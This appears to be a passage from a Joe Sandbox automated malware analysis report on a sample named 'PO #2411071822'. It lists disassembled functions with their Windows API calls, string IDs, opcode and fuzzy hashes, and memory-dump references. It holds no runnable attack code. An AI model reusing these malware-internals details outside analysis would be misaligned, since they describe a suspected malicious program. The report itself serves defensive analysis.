                                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0044E6DF
                                                                                                              • DestroyIcon.USER32(?,?,?,?,?,0044BEAF), ref: 0044E6EE
                                                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0044E70B
                                                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0044E717
                                                                                                                • Part of subcall function 00400FA7: __wcsicmp_l.LIBCMT ref: 00401030
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                              • String ID: .dll$.exe$.icl
                                                                                                              • API String ID: 1212759294-1154884017
                                                                                                              • Opcode ID: 2be8b8da92e012aa4334d1434dd68b8a01d843507955817c32b22d21141ff903
                                                                                                              • Instruction ID: 8502aeee5e7db0b8b64092ab1ee88c9c9bb823709fb6a9e3b6f0bc8504986e97
                                                                                                              • Opcode Fuzzy Hash: 2be8b8da92e012aa4334d1434dd68b8a01d843507955817c32b22d21141ff903
                                                                                                              • Instruction Fuzzy Hash: 7C61B371A00215FAFB14DF65CC45FFE7BA8BB18714F104216F915E61D1EBB89980CB68
                                                                                                              Function 0042D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003E936C: __swprintf.LIBCMT ref: 003E93AB
                                                                                                                • Part of subcall function 003E936C: __itow.LIBCMT ref: 003E93DF
                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 0042D292
                                                                                                              • GetDriveTypeW.KERNEL32 ref: 0042D2DF
                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0042D327
                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0042D35E
                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0042D38C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                              • API String ID: 1148790751-4113822522
                                                                                                              • Opcode ID: 244998578e6f3693e3ff6cddb1240c326c755da01095a1e8c39d33bb26cd7e38
                                                                                                              • Instruction ID: afe783d1fe841109f11efffa9f5993472a03eabedef6827176e51ffaaa3bd739
                                                                                                              • Opcode Fuzzy Hash: 244998578e6f3693e3ff6cddb1240c326c755da01095a1e8c39d33bb26cd7e38
                                                                                                              • Instruction Fuzzy Hash: 575179716043559FC701EF11C88196FB7E4EF98718F10896EF8866B2A1DB30EE06CB82
                                                                                                              Function 004226BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00453973,00000016,0000138C,00000016,?,00000016,0047DDB4,00000000,?), ref: 004226F1
                                                                                                              • LoadStringW.USER32(00000000,?,00453973,00000016), ref: 004226FA
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00453973,00000016,0000138C,00000016,?,00000016,0047DDB4,00000000,?,00000016), ref: 0042271C
                                                                                                              • LoadStringW.USER32(00000000,?,00453973,00000016), ref: 0042271F
                                                                                                              • __swprintf.LIBCMT ref: 0042276F
                                                                                                              • __swprintf.LIBCMT ref: 00422780
                                                                                                              • _wprintf.LIBCMT ref: 00422829
                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00422840
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                              • API String ID: 618562835-2268648507
                                                                                                              • Opcode ID: aa5d643340c500d83c0de2fcb1b4dcaf0728698eb3ce13cf6c7b0375c1f0c052
                                                                                                              • Instruction ID: 27e4e9898080a5e960f4063b016f81a35966ef309ed5820a2afe29fa7f73871c
                                                                                                              • Opcode Fuzzy Hash: aa5d643340c500d83c0de2fcb1b4dcaf0728698eb3ce13cf6c7b0375c1f0c052
                                                                                                              • Instruction Fuzzy Hash: 5E418272900169BACF11FBD1DE82EEEB778AF15344F500166F5017A0D2EAB86F09CB65
                                                                                                              Function 0042D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0042D0D8
                                                                                                              • __swprintf.LIBCMT ref: 0042D0FA
                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0042D137
                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0042D15C
                                                                                                              • _memset.LIBCMT ref: 0042D17B
                                                                                                              • _wcsncpy.LIBCMT ref: 0042D1B7
                                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0042D1EC
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0042D1F7
                                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 0042D200
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0042D20A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                              • String ID: :$\$\??\%s
                                                                                                              • API String ID: 2733774712-3457252023
                                                                                                              • Opcode ID: dd55688670d336e97ddad78c9fe2fa97504b45a89dcad4b97289cf974ed21353
                                                                                                              • Instruction ID: 61b48e87465bb93920ad3224b565bc9de6e4a4ace3b7434c13e0aa51cb1227bf
                                                                                                              • Opcode Fuzzy Hash: dd55688670d336e97ddad78c9fe2fa97504b45a89dcad4b97289cf974ed21353
                                                                                                              • Instruction Fuzzy Hash: 6631B372E00119ABDB20DFA1DC48FEB77BCAF89701F5040BAF509D21A0E77496448B39
                                                                                                              Function 0044E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0044BEF4,?,?), ref: 0044E754
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0044BEF4,?,?,00000000,?), ref: 0044E76B
                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0044BEF4,?,?,00000000,?), ref: 0044E776
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0044BEF4,?,?,00000000,?), ref: 0044E783
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0044E78C
                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0044BEF4,?,?,00000000,?), ref: 0044E79B
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0044E7A4
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0044BEF4,?,?,00000000,?), ref: 0044E7AB
                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0044BEF4,?,?,00000000,?), ref: 0044E7BC
                                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,0046D9BC,?), ref: 0044E7D5
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0044E7E5
                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0044E809
                                                                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0044E834
                                                                                                              • DeleteObject.GDI32(00000000), ref: 0044E85C
                                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0044E872
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                              • String ID:
                                                                                                              • API String ID: 3840717409-0
                                                                                                              • Opcode ID: 5648cd123b6cf0bc5d8271540e8ef3631217bff9daa9a699863eda787529b5e7
                                                                                                              • Instruction ID: 83c7dcee33d1bcd591d6ca1e2546794a1c32be013b9411d6d514ee72abc5f878
                                                                                                              • Opcode Fuzzy Hash: 5648cd123b6cf0bc5d8271540e8ef3631217bff9daa9a699863eda787529b5e7
                                                                                                              • Instruction Fuzzy Hash: 8D414975A00204EFDB119F66CC48EAB7BB8FF89725F104069F906D72A0E7749D41CB25
                                                                                                              Function 004305F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __wsplitpath.LIBCMT ref: 0043076F
                                                                                                              • _wcscat.LIBCMT ref: 00430787
                                                                                                              • _wcscat.LIBCMT ref: 00430799
                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004307AE
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 004307C2
                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 004307DA
                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 004307F4
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00430806
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                              • String ID: *.*
                                                                                                              • API String ID: 34673085-438819550
                                                                                                              • Opcode ID: 3019c3dd2a1f58101dcd495cf65742f1662eede6d2e3479b282eb86983dab8ff
                                                                                                              • Instruction ID: 967ae05e0ad0d72929d1a9e9ed07c0b84eac3e7337db04aadaab523c0d960bf4
                                                                                                              • Opcode Fuzzy Hash: 3019c3dd2a1f58101dcd495cf65742f1662eede6d2e3479b282eb86983dab8ff
                                                                                                              • Instruction Fuzzy Hash: 3081A0715043059FCB24EF24C86596FB3E8AB88304F149A2FF885D7251E738E945CB9A
                                                                                                              Function 0044EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FB34E: GetWindowLongW.USER32(?,000000EB), ref: 003FB35F
                                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0044EF3B
                                                                                                              • GetFocus.USER32 ref: 0044EF4B
                                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 0044EF56
                                                                                                              • _memset.LIBCMT ref: 0044F081
                                                                                                              • GetMenuItemInfoW.USER32 ref: 0044F0AC
                                                                                                              • GetMenuItemCount.USER32(00000000), ref: 0044F0CC
                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 0044F0DF
                                                                                                              • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0044F113
                                                                                                              • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0044F15B
                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0044F193
                                                                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0044F1C8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 1296962147-4108050209
                                                                                                              • Opcode ID: c62bb38c79ade18453c3d5efaa4d01341145e32d29f0919bf64cedd9201f7cc4
                                                                                                              • Instruction ID: aeeff8faa07281f9a89017eda57eb54aa16fa6ccb2a9eb8ad169cfeabf91f1e4
                                                                                                              • Opcode Fuzzy Hash: c62bb38c79ade18453c3d5efaa4d01341145e32d29f0919bf64cedd9201f7cc4
                                                                                                              • Instruction Fuzzy Hash: DF816B71A04311EFEB10CF15C884A6BBBE9FB88314F04492EF99597291D774DD09CBAA
                                                                                                              Function 0041A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0041ABD7
                                                                                                                • Part of subcall function 0041ABBB: GetLastError.KERNEL32(?,0041A69F,?,?,?), ref: 0041ABE1
                                                                                                                • Part of subcall function 0041ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0041A69F,?,?,?), ref: 0041ABF0
                                                                                                                • Part of subcall function 0041ABBB: HeapAlloc.KERNEL32(00000000,?,0041A69F,?,?,?), ref: 0041ABF7
                                                                                                                • Part of subcall function 0041ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0041AC0E
                                                                                                                • Part of subcall function 0041AC56: GetProcessHeap.KERNEL32(00000008,0041A6B5,00000000,00000000,?,0041A6B5,?), ref: 0041AC62
                                                                                                                • Part of subcall function 0041AC56: HeapAlloc.KERNEL32(00000000,?,0041A6B5,?), ref: 0041AC69
                                                                                                                • Part of subcall function 0041AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0041A6B5,?), ref: 0041AC7A
                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0041A8CB
                                                                                                              • _memset.LIBCMT ref: 0041A8E0
                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0041A8FF
                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 0041A910
                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 0041A94D
                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0041A969
                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 0041A986
                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0041A995
                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041A99C
                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0041A9BD
                                                                                                              • CopySid.ADVAPI32(00000000), ref: 0041A9C4
                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0041A9F5
                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0041AA1B
                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0041AA2F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3996160137-0
                                                                                                              • Opcode ID: a568935e142829b412fb5b3b0afd6062acffecd89fcf8596bd7cc824a5616bb8
                                                                                                              • Instruction ID: de36b881b0eb76679fd94f98309d064384eedba83b19ad37eaf02aeb3a0d5d6f
                                                                                                              • Opcode Fuzzy Hash: a568935e142829b412fb5b3b0afd6062acffecd89fcf8596bd7cc824a5616bb8
                                                                                                              • Instruction Fuzzy Hash: 51515CB1E01209AFDF10DF91DD45AEEBB79FF04304F04812AF911A7290EB789A55CB65
                                                                                                              Function 00439DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDC.USER32(00000000), ref: 00439E36
                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00439E42
                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 00439E4E
                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00439E5B
                                                                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00439EAF
                                                                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00439EEB
                                                                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00439F0F
                                                                                                              • SelectObject.GDI32(00000006,?), ref: 00439F17
                                                                                                              • DeleteObject.GDI32(?), ref: 00439F20
                                                                                                              • DeleteDC.GDI32(00000006), ref: 00439F27
                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 00439F32
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                              • String ID: (
                                                                                                              • API String ID: 2598888154-3887548279
                                                                                                              • Opcode ID: 3c0139ce9ff15646cfba8b91adb05cef809e333b57248ebf6da38d10348e743c
                                                                                                              • Instruction ID: 26149cb6ec55aa61e016294ea7f75a6f6daf0c4486456452acf3ea7cb4fd258c
                                                                                                              • Opcode Fuzzy Hash: 3c0139ce9ff15646cfba8b91adb05cef809e333b57248ebf6da38d10348e743c
                                                                                                              • Instruction Fuzzy Hash: 0D514B71A04309AFCB15CFA8CC85EAEBBB9EF48710F14842EF95997250D775AC41CB64
                                                                                                              Function 0042CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LoadString__swprintf_wprintf
                                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                              • API String ID: 2889450990-2391861430
                                                                                                              • Opcode ID: 0e9c44e7e3ddb0ec104543b9367cf30dde4d0c9abc8ea742a5fa21b3869dde45
                                                                                                              • Instruction ID: 6c6a059db6fc4b59a7df0bc83436089760443449382e0e00aa26cb6226665f28
                                                                                                              • Opcode Fuzzy Hash: 0e9c44e7e3ddb0ec104543b9367cf30dde4d0c9abc8ea742a5fa21b3869dde45
                                                                                                              • Instruction Fuzzy Hash: 0551D331900169BACF12EBE1DD82EEEBB78AF05304F100266F505760A2EB746F59CB65
                                                                                                              Function 0042CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LoadString__swprintf_wprintf
                                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                              • API String ID: 2889450990-3420473620
                                                                                                              • Opcode ID: 464e3de0b72e0cc75a091f871042ee964181dec17ceb40c74b083abc8f48e681
                                                                                                              • Instruction ID: 74a2b1b884f9a09f71916d93a580b433bfc0bce18c7aec5482d6f265d70ee9d0
                                                                                                              • Opcode Fuzzy Hash: 464e3de0b72e0cc75a091f871042ee964181dec17ceb40c74b083abc8f48e681
                                                                                                              • Instruction Fuzzy Hash: DC51D131900169BACF16EBE1DD82EEEBB78AF04344F500166F105760A2EB786F59CF65
                                                                                                              Function 00443C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00442BB5,?,?), ref: 00443C1D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BuffCharUpper
